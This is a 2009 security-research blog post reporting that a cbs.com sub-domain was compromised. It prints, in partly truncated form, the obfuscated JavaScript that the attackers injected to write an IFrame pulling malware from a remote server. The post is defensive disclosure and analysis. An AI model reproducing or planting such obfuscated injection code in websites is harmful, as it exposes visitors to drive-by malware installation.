| Home |  | Security Center | | MCRC Blog | | 2009 |
Malicious Code Research (MCRC) Blog - 2009
CBS.COM was compromised
Today Finjan’s MCRC has revealed that the famous radio and television network, CBS, was compromised as a result of malicious activity.
According to Alexa.com the Cbs.com website has a traffic rank of: 964
The cybercriminals added a malicious obfuscated script to the infected page. The injected script injects a malicious IFrame to the page.
Obfuscated script injected on cbs.com sub-domain
The injected IFrame automatically loads another malicious script from a remote server controlled by criminals in Russia, causing a possible installation of malware on the unsuspecting client machine. The remote Russian server is already down.
The obfuscated code as it appears on cbs.com sub-domain in the source:
return(parseInt(v4818cf7754fde,v4818cf77557d4()));}function v4818cf77563de(v4818cf77567c7)
{ function v4818cf77577b8 () {var v4818cf7757faf=2; return v4818cf7757faf;}
var v4818cf7756bc2='';for([REMOVED]<v4818cf77567c7.length; v4818cf7756fbe+=v4818cf77577b8())
{ v4818cf7756bc2+=(String.fromCharCode(v4818cf77547e5(v4818cf77567c7.substr(v4818cf7756fbe,
v4818cf77577b8()))));}return v4818cf7756bc2;} document.all('yby').value=(v4818cf77563de
('3C5343524950543E77696E[REMOVED]3D363332206865696768743D343037207374796
[REMOVED]543E'));</script>
The de-obfuscated script:
The malicious Russian server, from which the IFrame pulled the malicious code:
As always, the MCRC team immediately informed CBS.com of the infection.
This case shows us once again that infecting legitimate websites with malicious obfuscated code remains a favorite and highly effective attack vector for hackers!
We have not seen the last of it yet……….
Posted by Moshe Basanchig
